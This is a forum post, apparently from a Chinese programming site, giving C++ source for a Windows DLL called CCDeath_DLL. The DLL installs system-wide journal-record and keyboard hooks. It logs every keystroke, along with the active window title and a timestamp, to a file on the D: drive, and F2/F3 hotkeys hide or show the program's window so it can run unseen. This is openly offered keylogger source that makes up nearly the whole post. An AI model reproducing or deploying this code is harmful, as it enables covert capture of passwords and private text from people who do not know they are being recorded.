WINDOWS键盘钩子

ID:72008 · 发表于 2015-1-11 20:10

CCDeath_DLL.cpp文件
#include "afx.h"//file头文件
#include "windows.h"
#pragma data_seg("MySec")//创建一个节
HHOOK g_hKeyBoard=NULL;//键盘记录
HHOOK g_hFuncKeyBoard=NULL;//用来隐藏和显示窗口
HWND g_hWnd=NULL;//保存一个窗口句柄，必须副初值
HWND g_hLastFocusWnd=NULL;//记录上次得到焦点的窗口句柄
const int g_KeyPressMass=0x80000000;//键盘掩码常量
char ch=NULL,str[10]={0};//ch保存虚拟键的值
FILE *stream=NULL; //文件流输入文件
HWND g_hCurrentFocusWnd=NULL;//当前焦点的窗口句柄
char szTitle[200]={0};//当前窗口的名称
char szTime[100]={0};//当前的日期
char g_prevChar=NULL;//保存上一次按键值
#pragma data_seg()
#pragma comment(linker,"/section:MySec,RWS")//连接到连接器里面
//
//
//
//处理过程
LRESULT CALLBACK JournalRecordProc(
int code, // hook code
WPARAM wParam, // undefined
LPARAM lParam // address of message being processed
)
{
if(code==HC_ACTION)
{
EVENTMSG *pEvtMsg = (EVENTMSG *)lParam;
//和时间
stream = fopen("D:\\CCDeath.txt","a+t");//创建一个文件流指针向该文件
//处理按键消息
if(pEvtMsg->message==WM_KEYDOWN)
{
int vKey= LOBYTE(pEvtMsg->paramL);//取得虚拟键值
g_hCurrentFocusWnd=GetForegroundWindow();//取得当前活动窗口句柄
if(g_hLastFocusWnd!=g_hCurrentFocusWnd)
{
GetWindowText(g_hCurrentFocusWnd,szTitle,256);//获得标题
g_hLastFocusWnd=g_hCurrentFocusWnd;
SYSTEMTIME mytime;//获得当前时间与日期
GetLocalTime(&mytime);
CString m_time,m_Space,m_Back;
m_time.Format("\r\n记录时间:%d年%d月%d日,%02d小时%d分钟%d秒\r\n记录的文件名:",mytime.wYear,mytime.wMonth,\
mytime.wDay,mytime.wHour,mytime.wMinute,mytime.wSecond);
m_Space="\r\n---------------------键盘钩子为您记录 BY:DEBUG----------------------";//开头
m_Back="\r\n记录的内容:\r\n";//结束
fprintf(stream,"%s%s%s%s",m_Space,m_time,szTitle,m_Back);//写入文件
}
//测试SHIFT,CAPTION,NUMLOCK等键是否按下
int IsShift = GetKeyState(0x10);
int IsNumLock = GetKeyState(0x90);
int IsCapsLock = GetKeyState(0x14);
bool bShift=(IsShift & g_KeyPressMass)==g_KeyPressMass;
bool bCapsLock=((IsCapsLock & 1) ==1);
bool bNumLock=((IsNumLock & 1) ==1);
if(vKey>=48 && vKey<=57)//数字0到9
{
if(!bShift)//shift+1=!上档键
{
fprintf(stream,"%c",vKey);//写入0到九
}
}
if(vKey>=65 && vKey<=90)//字符大写A-Z
{
if(!bCapsLock)//没有大小锁定键
{
if(!bShift)//Shit+A=a \A+32=a;
{
ch=vKey+32;
}
else ch=vKey;
}
fprintf(stream,"%c",ch);
}
if (vKey >=96 && vKey<=105) // 小键盘0-9
{
if (bNumLock) fprintf(stream,"%c",vKey-96+48);
}
if (vKey>=186 && vKey<=222) // 其他键
{
switch (vKey)
{
case 186:if (!bShift) ch=';'; else ch=':';break;
case 187:if (!bShift) ch='='; else ch='+';break;
case 188:if (!bShift) ch=','; else ch='<' ;break;
case 189:if (!bShift) ch='-'; else ch='_';break;
case 190:if (!bShift) ch='.'; else ch='>';break;
case 191:if (!bShift) ch='/'; else ch='?';break;
case 192:if (!bShift) ch='`'; else ch='~';break;
case 219:if (!bShift) ch='['; else ch='{';break;
case 220:if (!bShift) ch='\\'; else ch='|';break;
case 221:if (!bShift) ch=']'; else ch='}';break;
case 222:if (!bShift) ch='\''; else ch='\"';break;
default:ch='n';break;
}
if (ch!='n') fprintf(stream,"%c",ch); //n是110n回车此时应该换行才对
}
if(vKey==9) //TAB
fprintf(stream,"%c",'\t');
if(vKey==13) //回车键
fprintf(stream,"%c",'\n');
}
fclose(stream);
return CallNextHookEx(g_hKeyBoard,code,wParam,lParam);
}
if(code<0)
{
return CallNextHookEx(g_hKeyBoard,code,wParam,lParam);
}
// return CallNextHookEx(g_hKeyBoard,code,wParam,lParam);
}
//用来程序的隐藏
LRESULT CALLBACK KeyboardProc(
int code, // hook code
WPARAM wParam, // virtual-key code
LPARAM lParam // keystroke-message information
)
{
if(VK_F3==wParam)
{
ShowWindow(g_hWnd,SW_SHOW);
}
if(VK_F2==wParam)
{
ShowWindow(g_hWnd,SW_HIDE);
}
if(VK_F4==wParam)
{
SendMessage(g_hWnd,WM_CLOSE,0,0);
UnhookWindowsHookEx(g_hFuncKeyBoard);
UnhookWindowsHookEx(g_hKeyBoard);
}
return 0;
}
//安装钩子
void InstallHook(HWND hWnd)
{
g_hWnd=hWnd;//对窗口进行操作，比如隐藏之类的
if(g_hKeyBoard==NULL)//安全性判断
{
g_hKeyBoard=SetWindowsHookEx(WH_JOURNALRECORD,JournalRecordProc,GetModuleHandle("CCDeath_DLL"),0);
}
if(g_hFuncKeyBoard==NULL)
{
g_hFuncKeyBoard=SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,GetModuleHandle("CCDeath_DLL"),0);
}
}
//御载钩子
void UnloadHook()
{
if(!g_hKeyBoard)
{
UnhookWindowsHookEx(g_hKeyBoard);
g_hKeyBoard=NULL;
}
if(!g_hFuncKeyBoard)
{
UnhookWindowsHookEx(g_hFuncKeyBoard);
g_hFuncKeyBoard=NULL;
}
}

复制代码

帐号		自动登录	找回密码
密码			立即注册

WINDOWS键盘钩子

相关帖子